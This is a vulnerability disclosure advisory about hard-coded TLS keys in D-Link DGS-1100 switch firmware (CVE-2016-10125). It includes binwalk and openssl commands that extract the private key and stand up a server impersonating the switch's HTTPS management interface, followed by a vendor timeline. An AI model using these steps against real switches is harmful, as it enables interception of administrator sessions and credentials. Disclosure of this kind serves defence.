1. Vulnerability Properties
Title: DLink DGS-1100 switch static hard-coded TLS cryptographic keys in firmware
CVE ID: CVE-2016-10125
CVSSv3 Base Score: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Vendor: DLink (http://www.dlink.com)
Products: DGS-1100 Series Gigabit Smart Managed Switches, RevB (possibly others)
Advisory Release Date: 24 Aug 2016
Advisory URL: https://labs.integrity.pt/advisories/dlink-dgs-1100-hardcoded-keys
Credits: Discovery by Bruno Morisson <bm[at]integrity.pt>
2. Vulnerability Summary
The DGS-1100 16 and 24 port switches (RevB) series firmware contains static, hardcoded cryptographic keys in the firmware. These keys, with the X.509 certificate, are used when HTTPS management is enabled on the switch.
An attacker can recover the private key from the public firmware, and use it perform a Man-In-The-Middle attack on the switch administrator, when he tries to manage the switch through HTTPS.
Since these keys are hardcoded, they cannot be changed.
3. Technical Details
Exploiting the vulnerability
To exploit this vulnerability, the attacker only needs to download the firmware, and extract the private key and the certificate:
$ binwalk DGS1100-fw_1.01.018.flash DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 969166 0xEC9CE Unix path: /../src/kernel/background.c 1238916 0x12E784 Certificate in DER format (x509 v3), header length: 4, sequence length: 685 1239608 0x12EA38 Private key in DER format (PKCS header length: 4, sequence length: 605
After extraction, check certificate:
$ openssl x509 -inform der -in 12E784.crt -noout -text Certificate: Data: Version: 3 (0x2) Serial Number: 123 (0x7b) Signature Algorithm: sha1WithRSAEncryption Issuer: CN=Sample Matrix RSA-1024 Certificate Authority, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test Validity Not Before: Jan 8 22:58:33 2013 GMT Not After : Jan 8 22:58:33 2016 GMT Subject: CN=Sample Matrix RSA-1024 Certificate, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:b6:53:c6:8e:1c:30:24:26:7d:c5:0c:96:9a:95: 95:7c:2e:4d:d3:0a:e2:1e:92:82:aa:07:30:ce:71: c4:2b:d1:45:be:e0:f6:02:98:b1:ad:62:3b:6b:ac: 84:57:9d:c5:e8:b7:3f:c4:bc:b5:2f:48:2a:c8:c8: 84:15:2b:fb:62:30:bc:db:ba:0f:a9:2c:3d:d7:70: bf:a0:af:86:5e:c6:c4:75:27:e3:7a:e2:7f:d4:da: 90:b6:a7:6c:a5:6e:e3:af:49:1b:4c:e4:5b:23:de: fa:5d:8b:fc:d8:65:73:ce:ef:86:34:f4:fb:28:3a: 06:e1:ca:74:0c:02:dc:45:87 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Basic Constraints: critical CA:FALSE Signature Algorithm: sha1WithRSAEncryption 70:47:b9:b1:40:4a:3c:03:62:ae:1e:a6:44:74:f9:ea:6e:fd: da:7d:ef:36:42:49:90:13:f9:6f:cb:6f:dc:d7:9c:fa:56:90: 89:9f:3b:87:d8:07:cb:3a:22:19:f6:6c:08:58:77:42:58:50: ac:f5:f9:ff:1c:df:ab:7c:a1:49:0b:18:5d:b9:47:a0:47:03: 71:9a:9b:dd:d3:cc:8a:bc:b7:77:3c:f1:a9:ff:5f:56:92:4a: 2d:84:9b:21:9e:44:30:5d:39:b9:38:a7:e1:b5:19:51:68:1f: a8:94:c2:22:d7:94:18:c1:55:78:ca:76:c2:da:7a:49:05:fd: 51:0c
Confirm this is the exact same certificate shown by the browser.
Check the extracted key:
$ openssl rsa -noout -modulus -in 12EA38.key -inform der
Run a webserver with this certificate and key:
$ openssl s_server -cert 12E784.crt -certform der -key 12EA38.key -keyform der -accept 443 -HTTP -tls1
An attacker would now be able to perform a man in the middle attack with a correct certificate, even if the administrator had saved this certificate as "trusted".
4. Vulnerable Versions
- Firmware 1.01.018 for Rev.B of the DGS-1100, possibly others.
No solution available. See “6. Workarounds”.
Ensure all accesses to the management interface of the switch are performed through a dedicated cable only.
7. Vulnerability Timeline
- 29 March 2016 – Reported vulnerability to vendor
- 31 March 2016 – Provided additional information to vendor;
- 27 May 2016 – Emailed vendor requesting feedback;
- 6 June 2016 – Vendor replied;
- 15 June 2016 – Emailed vendor saying available firmware is still the same vulnerable one;
- 29 June 2016 - Vendor sent pre-release version. We replied that we no longer have access to a device to assess if vulnerability is corrected;
- 27 June 2016 – Feedback requested on possible update;
- 24 Aug 2016 - No feedback received. Version available still vulnerable. Advisory released.